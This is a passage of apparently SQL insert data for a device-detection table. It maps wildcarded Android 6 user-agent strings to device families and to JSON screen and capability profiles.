Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Life Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Life One X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Life One X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Link50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lumigon_T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPAB500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPxS532L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPxS532U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPxX532L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPxX532U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M-PPxX555U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M1 E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M1E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M2 E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M20i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M3 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M3E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M3X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M4 SS4450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M4 SS4457) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M4 SS4458) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5 Plus Lte) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M556) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M576) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M577) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5s) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M621) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; M8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MAGNUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MAKU511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MAXTRON S8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":768,\"pixelRatio\":1.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MB5015) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MBOX) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_motorola','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":720,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MEDION B5530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MEIZU_M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 3W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 4LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 4W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 5C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 5s Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI 5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MI NOTE LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MITO A880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mito','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MK5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MO-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MORE 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MOVE 6+ KM0443) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MOVIC-W3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MS40S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MS45S_A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MS50S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MS514) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MSP95012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MSP95013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MSP95014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MSP95021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MSP96017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MStar Android TV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1280,\"screenHeight\":720,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MT6592) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MTN-L860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MTN-L860) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MTN-S810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MTS-T0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MX6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MYA-U29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 